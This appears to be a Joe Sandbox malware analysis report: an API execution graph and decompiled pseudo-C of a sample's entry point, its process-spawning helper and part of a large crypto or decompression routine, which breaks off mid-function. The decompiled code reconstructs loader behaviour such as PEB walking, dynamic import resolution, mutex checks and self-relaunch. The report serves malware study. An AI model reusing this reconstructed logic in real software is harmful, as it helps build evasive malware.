                  execution_graph 3428 402561 GetProcessHeap 3429 40257b 3428->3429 2839 40f072 2856 40cace 2839->2856 2844 40f0a8 2866 401a52 2844->2866 2846 40f0b9 2847 40f0d5 GetCommandLineW lstrlenW lstrlenW 2846->2847 2848 40f119 2847->2848 2849 40f120 2848->2849 2850 40f0fa lstrcmpiW 2848->2850 2870 401cc2 2849->2870 2850->2848 2851 40f10c 2850->2851 2875 40c84e GetTickCount 2851->2875 2885 4012cd GetPEB 2856->2885 2858 40db70 2887 4012ff 2858->2887 2860 40db7d 2861 40db84 2860->2861 2862 4012cd GetPEB 2861->2862 2863 40f05e 2862->2863 2864 4012ff 2 API calls 2863->2864 2865 40f06b GetModuleFileNameW 2864->2865 2865->2844 2867 401a70 2866->2867 2905 4014f2 GetProcessHeap 2867->2905 2869 401a84 2869->2846 2869->2869 2907 401503 2870->2907 2873 401d0f CloseHandle CloseHandle 2874 401d03 ExitProcess 2873->2874 2911 40c493 GetWindowsDirectoryW 2875->2911 2880 40c8a5 ExitProcess 2881 40c875 WaitForSingleObject 2882 40c88f 2881->2882 2882->2880 2929 40c78f 2882->2929 2884 40c894 WaitForSingleObject 2884->2882 2886 4012e2 2885->2886 2886->2858 2888 401306 2887->2888 2890 401224 2887->2890 2888->2860 2889 4012c3 2889->2860 2890->2889 2891 4012a7 2890->2891 2893 401192 2891->2893 2894 4011a3 2893->2894 2895 4012cd GetPEB 2894->2895 2896 4011f3 2895->2896 2897 4011f7 LoadLibraryW 2896->2897 2898 401208 2896->2898 2897->2898 2899 40121a 2897->2899 2901 401224 2898->2901 2899->2890 2902 4012c3 2901->2902 2903 401260 2901->2903 2902->2899 2903->2902 2904 401192 2 API calls 2903->2904 2904->2903 2906 401502 2905->2906 2906->2869 2910 40150b memset 2907->2910 2909 401509 2909->2873 2909->2874 2910->2909 2912 40c4f1 2911->2912 2914 40c4b2 GetVolumeInformationW 2911->2914 2915 40c601 2912->2915 2914->2912 2958 40c4f5 2915->2958 2917 40c609 2918 40c60d WaitForSingleObject 2917->2918 2919 40c67d 2917->2919 2920 40c624 2918->2920 2919->2880 2919->2881 2920->2919 2962 40c54e 2920->2962 2922 40c62d 2923 40c665 ReleaseMutex CloseHandle 2922->2923 2966 40c5a7 2922->2966 2923->2919 2925 40c636 2925->2923 2926 40c63a SignalObjectAndWait 2925->2926 2927 40c653 2926->2927 2928 40c657 ResetEvent 2926->2928 2927->2923 2927->2928 2928->2923 2930 40c79a 2929->2930 2931 40c80f 2929->2931 2932 40c7c9 2930->2932 2933 40c79d 2930->2933 3038 40632a 2931->3038 3003 408922 2932->3003 2935 40c7a0 2933->2935 2936 40c7b8 2933->2936 2940 40c7a7 SetEvent 2935->2940 2941 40c840 2935->2941 2970 40c682 GetTickCount 2936->2970 2940->2941 2941->2884 2952 40c82c GetTickCount 2952->2884 2957 40c7e9 2957->2941 2957->2952 2959 401a52 GetProcessHeap 2958->2959 2960 40c50e 2959->2960 2961 40c52d CreateMutexW 2960->2961 2961->2917 2963 401a52 GetProcessHeap 2962->2963 2964 40c567 2963->2964 2965 40c586 CreateMutexW 2964->2965 2965->2922 2967 401a52 GetProcessHeap 2966->2967 2968 40c5c0 2967->2968 2969 40c5df CreateEventW 2968->2969 2969->2925 3073 40fa9b 2970->3073 2972 40c6a3 lstrlen 3074 402398 RtlGetVersion GetNativeSystemInfo 2972->3074 2974 40c6b9 3075 401e04 GetPEB 2974->3075 2976 40c6c1 3076 4022d2 2976->3076 2982 40c6e7 2983 40c778 2982->2983 3099 406104 2982->3099 3152 401532 GetProcessHeap HeapFree 2983->3152 2987 40c780 3153 401532 GetProcessHeap HeapFree 2987->3153 2988 40c702 2991 40c715 2988->2991 3126 40f9df 2988->3126 2989 40c759 GetTickCount 2992 40c757 2989->2992 3132 40c9a3 2991->3132 3151 401532 GetProcessHeap HeapFree 2992->3151 2993 40c788 2993->2884 2997 40c74d 3150 401532 GetProcessHeap HeapFree 2997->3150 2999 40c720 2999->2997 3000 40c73e 2999->3000 3135 40f99a 2999->3135 3000->2997 3142 40fd40 3000->3142 3004 401a52 GetProcessHeap 3003->3004 3005 408c9b LoadLibraryW 3004->3005 3006 408cb0 3005->3006 3007 4012ff 2 API calls 3006->3007 3008 408ccd 3007->3008 3009 408cd5 3008->3009 3010 401a52 GetProcessHeap 3009->3010 3011 409bc0 LoadLibraryW 3010->3011 3012 409bd5 3011->3012 3013 4012ff 2 API calls 3012->3013 3014 409bf5 3013->3014 3015 409bfd 3014->3015 3016 401a52 GetProcessHeap 3015->3016 3017 40a28c LoadLibraryW 3016->3017 3018 40a2a1 3017->3018 3019 4012ff 2 API calls 3018->3019 3020 40a2c1 3019->3020 3021 40a2c9 3020->3021 3022 401a52 GetProcessHeap 3021->3022 3023 40b678 LoadLibraryW 3022->3023 3024 40b68d 3023->3024 3025 4012ff 2 API calls 3024->3025 3026 40b6ad 3025->3026 3027 40b6b5 3026->3027 3028 401a52 GetProcessHeap 3027->3028 3029 40c456 LoadLibraryW 3028->3029 3030 40c46b 3029->3030 3031 4012ff 2 API calls 3030->3031 3032 40c48b 3031->3032 3033 4060c5 3032->3033 3034 406101 3033->3034 3035 4060e9 3033->3035 3034->2957 3035->3035 3409 401ffc 3035->3409 3039 401a52 GetProcessHeap 3038->3039 3040 407689 LoadLibraryW 3039->3040 3041 40769e 3040->3041 3042 4012ff 2 API calls 3041->3042 3043 4076be 3042->3043 3044 4076c6 3043->3044 3045 401a52 GetProcessHeap 3044->3045 3046 4088e5 LoadLibraryW 3045->3046 3047 4088fa 3046->3047 3048 4012ff 2 API calls 3047->3048 3049 40891a 3048->3049 3050 40f92d 3049->3050 3051 40f93d 3050->3051 3418 40f149 3051->3418 3053 40f942 3421 40f26c 3053->3421 3073->2972 3074->2974 3075->2976 3154 401943 CreateToolhelp32Snapshot 3076->3154 3079 402318 3081 4014f2 GetProcessHeap 3079->3081 3080 402305 lstrlenW 3080->3079 3080->3080 3082 402328 3081->3082 3083 402376 3082->3083 3085 402334 lstrcpyW lstrlenW 3082->3085 3086 40235c 3082->3086 3084 40238a 3083->3084 3168 401532 GetProcessHeap HeapFree 3083->3168 3091 40fcf6 3084->3091 3085->3082 3161 402424 WideCharToMultiByte 3086->3161 3092 40fd08 3091->3092 3093 40c6dc 3092->3093 3094 4014f2 GetProcessHeap 3092->3094 3095 40c901 3093->3095 3094->3093 3096 40c913 3095->3096 3097 4014f2 GetProcessHeap 3096->3097 3098 40c91d 3097->3098 3098->2982 3179 405e88 3099->3179 3102 406279 3102->2988 3102->2989 3104 406157 3105 406272 3104->3105 3191 40207b 3104->3191 3242 401532 GetProcessHeap HeapFree 3105->3242 3109 406267 3241 401532 GetProcessHeap HeapFree 3109->3241 3111 401a52 GetProcessHeap 3112 406183 3111->3112 3197 405fa4 3112->3197 3115 406254 3240 401532 GetProcessHeap HeapFree 3115->3240 3121 40624c 3239 401532 GetProcessHeap HeapFree 3121->3239 3123 406241 3238 401532 GetProcessHeap HeapFree 3123->3238 3127 40fa3f 3126->3127 3128 40f9f5 3126->3128 3127->2991 3129 401a52 GetProcessHeap 3128->3129 3130 40fa09 3129->3130 3130->3127 3131 401a52 GetProcessHeap 3130->3131 3131->3127 3133 401503 memset 3132->3133 3134 40c9b9 3133->3134 3134->2999 3340 40f883 lstrcpyW lstrlenW GetTickCount 3135->3340 3140 40f9d9 3140->3000 3141 401cc2 3 API calls 3141->3140 3147 40fd52 3142->3147 3144 40fdb7 3144->2997 3145 4014f2 GetProcessHeap 3145->3147 3147->3144 3147->3145 3348 40fc1d 3147->3348 3353 40fb72 3147->3353 3367 40fb2f 3147->3367 3374 40caa6 3147->3374 3150->2992 3151->2983 3152->2987 3153->2993 3155 401961 Process32FirstW 3154->3155 3156 4019a5 3154->3156 3157 401989 3155->3157 3156->3079 3156->3080 3158 40199e CloseHandle 3157->3158 3160 40197b Process32NextW 3157->3160 3169 402255 3157->3169 3158->3156 3160->3157 3162 402367 3161->3162 3163 40244a 3161->3163 3167 401532 GetProcessHeap HeapFree 3162->3167 3164 4014f2 GetProcessHeap 3163->3164 3165 402451 3164->3165 3165->3162 3166 402457 WideCharToMultiByte 3165->3166 3166->3162 3167->3083 3168->3083 3170 40226b 3169->3170 3171 402273 GetCurrentProcessId 3170->3171 3172 4022c8 3170->3172 3171->3172 3173 40227e 3171->3173 3172->3157 3173->3172 3174 402284 GetCurrentProcessId 3173->3174 3174->3172 3175 40228f 3174->3175 3175->3172 3176 4014f2 GetProcessHeap 3175->3176 3177 4022a9 3176->3177 3177->3172 3178 4022af lstrcpyW 3177->3178 3178->3172 3180 405e9c 3179->3180 3181 4014f2 GetProcessHeap 3180->3181 3182 405ea8 3181->3182 3186 405ec8 3182->3186 3243 4027a7 3182->3243 3186->3102 3187 4062d8 3186->3187 3188 4062ea 3187->3188 3189 4014f2 GetProcessHeap 3188->3189 3190 4062f4 3189->3190 3190->3104 3192 402094 3191->3192 3193 4014f2 GetProcessHeap 3192->3193 3194 4020ad 3193->3194 3196 40214a 3194->3196 3296 401532 GetProcessHeap HeapFree 3194->3296 3196->3109 3196->3111 3198 401503 memset 3197->3198 3199 405fbf 3198->3199 3200 401a52 GetProcessHeap 3199->3200 3201 405fce 3200->3201 3297 405f15 lstrlenW GetTickCount 3201->3297 3203 405fd9 3204 401a52 GetProcessHeap 3203->3204 3205 405fef 3204->3205 3206 4014f2 GetProcessHeap 3205->3206 3207 40602a 3206->3207 3208 4060a8 3207->3208 3209 40603e GetTickCount 3207->3209 3208->3115 3216 40140a 3208->3216 3210 40605a 3209->3210 3211 4014f2 GetProcessHeap 3210->3211 3212 406064 3211->3212 3214 406079 3212->3214 3299 401e27 GetTickCount 3212->3299 3301 401532 GetProcessHeap HeapFree 3214->3301 3302 401345 3216->3302 3219 4014e9 3219->3115 3225 40215a 3219->3225 3221 401a52 GetProcessHeap 3223 401467 3221->3223 3222 4014c4 3312 401532 GetProcessHeap HeapFree 3222->3312 3223->3222 3306 401383 3223->3306 3226 40217a 3225->3226 3229 402173 3225->3229 3227 4014f2 GetProcessHeap 3226->3227 3226->3229 3230 40219e 3227->3230 3229->3121 3229->3123 3231 405ed3 3229->3231 3230->3229 3320 401532 GetProcessHeap HeapFree 3230->3320 3232 4014f2 GetProcessHeap 3231->3232 3233 405eea 3232->3233 3237 405f0a 3233->3237 3321 402a73 memset 3233->3321 3235 405efd 3235->3237 3325 401532 GetProcessHeap HeapFree 3235->3325 3237->3123 3238->3121 3239->3115 3240->3109 3241->3105 3242->3102 3247 402727 memset 3243->3247 3245 4027b6 3245->3186 3246 401532 GetProcessHeap HeapFree 3245->3246 3246->3186 3248 402759 3247->3248 3252 402752 3247->3252 3253 402594 3248->3253 3252->3245 3260 4025a0 3253->3260 3255 40259c 3255->3252 3256 402629 3255->3256 3257 40263c 3256->3257 3258 402653 3256->3258 3257->3258 3269 4047dd 3257->3269 3258->3252 3261 4025aa 3260->3261 3263 4025b9 3261->3263 3264 40499d 3261->3264 3263->3255 3265 404a03 3264->3265 3266 4049ed memset 3264->3266 3267 404a87 memset 3265->3267 3268 404a9d memset memset 3265->3268 3266->3265 3267->3268 3268->3263 3270 4047ee 3269->3270 3272 404808 3269->3272 3270->3257 3271 4048f4 3284 40436d 3271->3284 3272->3270 3272->3271 3274 4048e1 3272->3274 3280 403e46 3274->3280 3276 4048e8 3276->3270 3288 4037a9 3276->3288 3279 404952 memset memset 3279->3270 3282 403e86 3280->3282 3281 404271 3281->3276 3282->3281 3283 4037a9 8 API calls 3282->3283 3283->3282 3286 404395 3284->3286 3285 40473a 3285->3276 3286->3285 3287 4037a9 8 API calls 3286->3287 3287->3285 3289 4037c7 3288->3289 3290 40378e 6 API calls 3289->3290 3291 4038ff 3289->3291 3290->3291 3292 40378e 6 API calls 3291->3292 3295 40392e memset memset 3291->3295 3292->3295 3294 403bd4 3294->3270 3294->3279 3295->3294 3296->3196 3298 405f3d 3297->3298 3298->3203 3300 401e44 3299->3300 3300->3214 3301->3208 3303 401368 3302->3303 3304 401379 3303->3304 3313 4023e5 MultiByteToWideChar 3303->3313 3304->3221 3304->3222 3307 40139b 3306->3307 3308 4014f2 GetProcessHeap 3307->3308 3310 4013e7 3307->3310 3309 4013b0 3308->3309 3309->3310 3319 401532 GetProcessHeap HeapFree 3309->3319 3310->3222 3312->3219 3314 402401 3313->3314 3315 40241e 3313->3315 3316 4014f2 GetProcessHeap 3314->3316 3315->3304 3317 402409 3316->3317 3317->3315 3318 40240f MultiByteToWideChar 3317->3318 3318->3315 3319->3310 3320->3229 3322 402aa5 3321->3322 3324 402a9e 3321->3324 3322->3324 3326 40284f 3322->3326 3324->3235 3325->3237 3327 402865 3326->3327 3331 40289b 3326->3331 3328 4028af 3327->3328 3327->3331 3332 402917 3327->3332 3333 404ad4 3328->3333 3330 404ad4 6 API calls 3330->3332 3331->3324 3332->3330 3332->3331 3339 404b19 _memset 3333->3339 3334 404e76 memset 3334->3339 3335 404e04 memset 3335->3339 3336 404bd9 3336->3331 3337 404f66 memset memset memset 3337->3339 3338 40533d memset 3338->3339 3339->3334 3339->3335 3339->3336 3339->3337 3339->3338 3346 401e8f GetTickCount 3340->3346 3342 40f8bd 3343 40f8e6 CreateFileW 3342->3343 3344 40f926 3343->3344 3345 40f90d WriteFile CloseHandle 3343->3345 3344->3140 3344->3141 3345->3344 3347 401eb0 3346->3347 3347->3342 3378 401855 3348->3378 3350 40fc5c 3350->3147 3351 40fc2d 3351->3350 3352 40fc43 CreateThread 3351->3352 3352->3350 3391 40fb06 3352->3391 3393 40faa1 3353->3393 3356 40f8e6 3 API calls 3357 40fb9d 3356->3357 3358 40fc18 3357->3358 3397 401dcb WTSGetActiveConsoleSessionId 3357->3397 3358->3147 3361 401a52 GetProcessHeap 3362 40fbbd 3361->3362 3401 401d2b 3362->3401 3364 40fbf6 3365 40fbfd CloseHandle CloseHandle 3364->3365 3366 40fc0f CloseHandle 3364->3366 3365->3366 3366->3358 3368 40faa1 3 API calls 3367->3368 3369 40fb46 3368->3369 3370 40f8e6 3 API calls 3369->3370 3371 40fb56 3370->3371 3372 40fb6c 3371->3372 3373 401cc2 3 API calls 3371->3373 3372->3147 3373->3372 3375 40cab7 3374->3375 3376 40cac5 3375->3376 3406 40ca23 3375->3406 3376->3147 3379 401866 3378->3379 3380 401873 VirtualAlloc 3379->3380 3381 401922 3379->3381 3380->3381 3382 401890 3380->3382 3381->3351 3386 40179c 3382->3386 3385 401913 VirtualFree 3385->3381 3387 401819 3386->3387 3389 4017b0 3386->3389 3387->3381 3387->3385 3388 4017be LoadLibraryA 3388->3387 3388->3389 3389->3387 3389->3388 3390 4017ea GetProcAddress 3389->3390 3390->3387 3390->3389 3392 40fb17 3391->3392 3394 40fab4 lstrlenW GetTickCount 3393->3394 3395 401e8f GetTickCount 3394->3395 3396 40fadd 3395->3396 3396->3356 3398 401de3 3397->3398 3399 401dfc 3398->3399 3400 401df3 CloseHandle 3398->3400 3399->3358 3399->3361 3400->3399 3402 401503 memset 3401->3402 3403 401d48 3402->3403 3404 401d61 3403->3404 3405 401a52 GetProcessHeap 3403->3405 3404->3364 3405->3404 3407 401503 memset 3406->3407 3408 40ca39 3407->3408 3408->3376 3410 401503 memset 3409->3410 3411 402009 3410->3411 3414 401f75 3411->3414 3416 401f94 3414->3416 3415 401fe6 3415->2957 3416->3415 3417 401fd7 LocalFree 3416->3417 3417->3415 3419 401503 memset 3418->3419 3420 40f15e GetModuleFileNameW 3419->3420 3420->3053 3422 401a52 GetProcessHeap 3421->3422 3423 40f27c 3422->3423 3426 40f190 lstrlenW 3423->3426 3427 40f1b4 3426->3427 3430 40fc67 3432 40fc78 3430->3432 3434 40fcd4 3430->3434 3431 40fc90 WaitForSingleObject 3431->3432 3432->3431 3432->3434 3437 40192a VirtualFree 3432->3437 3438 401532 GetProcessHeap HeapFree 3432->3438 3436 40fcaf CloseHandle 3436->3432 3437->3436 3438->3432 3439 40ff28 IsProcessorFeaturePresent 3440 40ff4e 3439->3440 3441 405a5d 3446 404d56 _memset 3441->3446 3442 405a6b 3442->3442 3443 404e04 memset 3443->3446 3444 404e76 memset 3444->3446 3445 404f66 memset memset memset 3445->3446 3446->3442 3446->3443 3446->3444 3446->3445 3447 40533d memset 3446->3447 3447->3446 3448 40257d GetProcessHeap HeapFree

                  Executed Functions

                  Function 0040F072, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63stringUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 91%
                  			_entry_() {
				char _v20;
				short _v540;
				short _v1060;
				void* _t15;
				int _t21;
				WCHAR* _t25;
				void* _t38;
				WCHAR* _t39;
				WCHAR* _t43;

				E0040CACE();
				E0040DB84();
				GetModuleFileNameW(0,  &_v1060, 0x104);
				_t15 = E00401144( &_v1060);
				_t38 = E00401A52(0x4129a0, 0x72fc3a35);
				 *0x4143a4( &_v540, 0x104, _t38, _t15);
				_t32 = _t38;
				L00401B09(_t38);
				_t39 = GetCommandLineW();
				_t21 = lstrlenW(_t39);
				_t43 =  &(_t39[_t21 - lstrlenW( &_v540)]);
				while(_t39 <= _t43) {
					_t25 = lstrcmpiW(_t39,  &_v540); // executed
					__eflags = _t25;
					if(__eflags != 0) {
						_t39 =  &(_t39[1]);
						__eflags = _t39;
						continue;
					}
					E0040C84E(0x104, _t32, _t39, __eflags);
					ExitProcess(0);
				}
				E00401CC2( &_v1060,  &_v540, _t32,  &_v20); // executed
				ExitProcess(0);
			}












                  0x0040f07e
                  0x0040f083
                  0x0040f097
                  0x0040f0a3
                  0x0040f0b9
                  0x0040f0c5
                  0x0040f0ce
                  0x0040f0d0
                  0x0040f0db
                  0x0040f0de
                  0x0040f0f5
                  0x0040f11c
                  0x0040f102
                  0x0040f108
                  0x0040f10a
                  0x0040f119
                  0x0040f119
                  0x00000000
                  0x0040f119
                  0x0040f10c
                  0x0040f113
                  0x0040f113
                  0x0040f131
                  0x0040f13a

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F097
                  • _snwprintf.NTDLL ref: 0040F0C5
                  • GetCommandLineW.KERNEL32 ref: 0040F0D5
                  • lstrlenW.KERNEL32(00000000), ref: 0040F0DE
                  • lstrlenW.KERNEL32(?), ref: 0040F0ED
                  • lstrcmpiW.KERNELBASE(00000000,?), ref: 0040F102
                  • ExitProcess.KERNEL32 ref: 0040F113
                    • Part of subcall function 00401CC2: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • ExitProcess.KERNEL32 ref: 0040F13A
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                  • String ID: g8Cw
                  • API String ID: 4243820956-3103284439
                  • Opcode ID: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction ID: 96f63cbf6c12603b9eafb981d3b8471d0b236fe68b2e75c18f179b1aecd08856
                  • Opcode Fuzzy Hash: e8fef4413f66b5dc776fc09e6af1cab733b72d7a78056a43239f7943bfe9b5bf
                  • Instruction Fuzzy Hash: 5F118472600118ABD710AB65DC89AFF377CEB40349F00417AF505A7192EE346E458BA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401CC2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50processUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 21 401cc2-401cfa call 401503 25 401d23 21->25 26 401cfc-401d01 21->26 29 401d25-401d2a 25->29 27 401d03-401d09 26->27 28 401d0f-401d21 CloseHandle * 2 26->28 30 401d0a-401d0d 27->30 28->30 30->29
                  C-Code - Quality: 64%
                  			E00401CC2(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				int _t13;
				void* _t22;

				_t22 = 0x44;
				E00401503( &_v88, _t22);
				_v88.cb = 0x44;
				_t13 = CreateProcessW(__ecx, __edx, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
				if(_t13 == 0) {
					return 0;
				}
				if(_a8 == 0) {
					CloseHandle(_v20);
					CloseHandle(_v20.hThread);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}







                  0x00401cd0
                  0x00401cd4
                  0x00401cdc
                  0x00401cf2
                  0x00401cfa
                  0x00000000
                  0x00401d23
                  0x00401d01
                  0x00401d12
                  0x00401d1b
                  0x00401d03
                  0x00401d06
                  0x00401d07
                  0x00401d08
                  0x00401d09
                  0x00401d09
                  0x00000000

                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • CloseHandle.KERNEL32(?), ref: 00401D12
                  • CloseHandle.KERNEL32(0040F136), ref: 00401D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D$M vu
                  • API String ID: 2922976086-427032030
                  • Opcode ID: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction ID: 78a74d64e74da198333939fe1c260d8d1ae2390c954a34ff9c8bd1b4990b218a
                  • Opcode Fuzzy Hash: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction Fuzzy Hash: D7F0A472900108ABDB12DFA5DC04AEFB7BDEF45712B108036F916F71A0EB78AD058694
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Non-executed Functions

                  Function 00404AD4, Relevance: 24.4, APIs: 11, Strings: 2, Instructions: 1626UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E00404AD4(int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, signed char* _a12, signed int* _a16, signed int _a20) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed char _v56;
				intOrPtr _v60;
				int* _v64;
				signed int _v68;
				int _v72;
				void* _v76;
				intOrPtr _v80;
				signed int _v144;
				signed int _v148;
				void _v212;
				signed int _t759;
				signed int* _t763;
				void* _t764;
				signed int _t769;
				signed int _t770;
				intOrPtr _t771;
				int _t772;
				signed int _t774;
				void* _t775;
				signed int _t782;
				void* _t785;
				signed int* _t786;
				void* _t792;
				intOrPtr _t795;
				signed char* _t813;
				intOrPtr _t815;
				void* _t816;
				signed int _t819;
				intOrPtr _t822;
				signed int _t823;
				signed int _t828;
				signed int _t830;
				signed int _t834;
				unsigned int _t836;
				signed int _t837;
				signed int _t841;
				unsigned int _t843;
				signed int _t846;
				signed int _t849;
				unsigned int _t850;
				signed int _t852;
				signed char _t853;
				signed int _t855;
				signed int _t864;
				signed int _t865;
				signed int _t868;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				void* _t875;
				signed int _t879;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t889;
				char _t890;
				signed int _t894;
				signed int _t900;
				signed int _t902;
				signed char _t908;
				signed int _t910;
				signed int _t913;
				signed int _t915;
				signed int _t919;
				signed int _t920;
				signed int _t922;
				signed int _t926;
				signed int _t934;
				intOrPtr _t937;
				signed int _t939;
				signed int _t941;
				signed int _t948;
				signed int _t960;
				signed int _t962;
				signed char _t968;
				signed int _t970;
				signed int _t972;
				intOrPtr _t988;
				signed int _t989;
				void* _t999;
				signed int _t1004;
				signed int _t1008;
				signed int _t1009;
				signed int _t1011;
				signed int _t1014;
				signed int _t1019;
				signed int _t1029;
				signed int _t1031;
				signed char _t1037;
				signed int _t1039;
				signed int _t1041;
				signed int _t1044;
				signed int _t1046;
				signed int _t1051;
				signed int _t1060;
				signed int _t1066;
				int _t1067;
				signed int _t1075;
				signed int _t1077;
				signed int _t1078;
				signed int _t1079;
				signed int _t1080;
				signed int _t1082;
				signed int _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1090;
				signed int _t1091;
				signed int _t1093;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1112;
				signed int _t1113;
				void* _t1114;
				intOrPtr _t1115;
				signed char* _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1121;
				signed int _t1123;
				signed int _t1124;
				signed int _t1126;
				signed int _t1127;
				signed char _t1128;
				signed int _t1135;
				signed int _t1137;
				signed int _t1138;
				signed int* _t1139;
				signed int _t1141;
				unsigned int _t1145;
				signed int _t1146;
				void* _t1157;
				void* _t1158;
				signed char _t1161;
				signed int _t1163;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed char _t1169;
				unsigned int _t1170;
				signed char _t1176;
				signed int _t1177;
				signed int _t1185;
				signed int* _t1187;
				signed int _t1191;
				signed char _t1194;
				signed int _t1195;
				void* _t1197;
				signed int _t1198;
				signed int _t1199;
				signed char _t1200;
				signed int _t1201;
				signed int _t1202;
				signed char _t1203;
				int _t1205;
				intOrPtr* _t1208;
				signed char _t1216;
				signed int _t1219;
				signed int* _t1221;
				signed int _t1222;
				signed char _t1229;
				signed int _t1232;
				signed char _t1233;
				signed char _t1234;
				void* _t1239;
				void* _t1244;
				intOrPtr _t1245;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed char _t1251;
				int _t1253;
				signed int _t1256;
				signed char _t1263;
				signed int _t1266;
				signed int _t1267;
				signed char _t1270;
				signed char _t1271;
				signed int _t1274;
				void* _t1275;
				signed int _t1277;
				signed int _t1279;
				void* _t1288;
				signed int _t1291;
				void* _t1296;
				signed int _t1299;
				signed int _t1301;
				int* _t1302;
				unsigned int _t1303;
				signed int _t1304;
				void* _t1305;
				int _t1310;
				signed int _t1315;
				signed int _t1317;
				signed int _t1320;
				unsigned int _t1321;
				char* _t1322;
				signed int _t1326;
				int* _t1350;
				signed int _t1351;
				signed int* _t1352;
				signed int _t1355;
				signed int _t1358;
				intOrPtr _t1359;
				void* _t1363;
				signed int _t1364;
				signed int _t1365;
				void* _t1366;
				void* _t1367;
				void* _t1368;
				void* _t1369;
				void* _t1370;
				void* _t1371;
				void* _t1372;
				signed int _t1373;
				int _t1374;
				signed int _t1375;
				int* _t1376;
				void* _t1377;
				void* _t1378;
				void* _t1379;
				void* _t1384;
				void* _t1385;

				_t1288 = __edx;
				_v16 = __edx;
				_t1113 = _t1112 | 0xffffffff;
				_v76 = __edx;
				_t1363 = _a12;
				_v36 =  *_a4 + __edx;
				_t1350 = __ecx;
				_v20 = _t1113;
				_v64 = __ecx;
				_t759 =  *_a16;
				_v32 = _t1363;
				_v60 = _t759 + _t1363;
				_t1135 = _a20 & 0x00000004;
				_v52 = _t1135;
				if(_t1135 == 0) {
					_t16 = _t1363 - 1; // 0x7
					_t1137 = _t16 + _t759 - _a8;
					__eflags = _t1137;
					_v68 = _t1137;
				} else {
					_t1137 = _t1113;
					_v68 = _t1113;
				}
				_t18 = _t1137 + 1; // 0x8
				if((_t1137 & _t18) != 0 || _t1363 < _a8) {
					 *_a16 =  *_a16 & 0x00000000;
					_t763 = _a4;
					 *_t763 =  *_t763 & 0x00000000;
					__eflags =  *_t763;
					_t764 = 0xfffffffd;
					return _t764;
				} else {
					_v28 = _v28 & 0x00000000;
					_t1364 = _t1350[1];
					_t1138 = _t1350[9];
					_v8 = _t1350[0xe];
					_v44 = _t1350[8];
					_v56 = _t1350[0xa];
					_v72 = _t1350[0xf];
					_t769 =  *_t1350;
					_v48 = _t1364;
					_v12 = _t1138;
					_v24 = 1;
					_v80 = 0x90;
					_t1384 = _t769 - 0x18;
					if(_t1384 > 0) {
						__eflags = _t769 - 0x25;
						if(__eflags > 0) {
							_t770 = _t769 - 0x26;
							__eflags = _t770;
							if(_t770 == 0) {
								_t1139 = _v32;
								_t771 = _v60;
								L59:
								__eflags = _t1288 - _v36;
								if(_t1288 >= _v36) {
									 *_t1350 = 0x26;
									L335:
									_t772 = _v24;
									L336:
									_t1114 = 0xfffffffc;
									_t1113 =  !=  ? _t772 : _t1114;
									L337:
									_v20 = _t1113;
									if(_t1113 == _t772 || _t1113 == 0xfffffffc) {
										L343:
										_t1350[1] = _t1364;
										asm("bts ecx, esi");
										_t774 =  >=  ? 0 : 0;
										_t1141 = 0 ^ _t774;
										_t775 =  >=  ? _t1141 : _t774;
										_t1350[8] = _v44;
										_t1350[9] = _v12;
										_t1350[0xa] = _v56;
										_t1350[0xf] = _v72;
										_t1350[0xe] = _t1141 - 0x00000001 & _v8;
										 *_a4 = _t1288 - _v76;
										_t782 = _v32 - _a12;
										_v32 = _t782;
										 *_a16 = _t782;
										if((_a20 & 0x00000009) == 0 || _t1113 < 0) {
											L360:
											return _t1113;
										} else {
											_a4 = 0x15b0;
											_t1291 = _t782 % _a4;
											_t1145 = _t1350[7];
											_t1365 = _t1145 & 0x0000ffff;
											_t1146 = _t1145 >> 0x10;
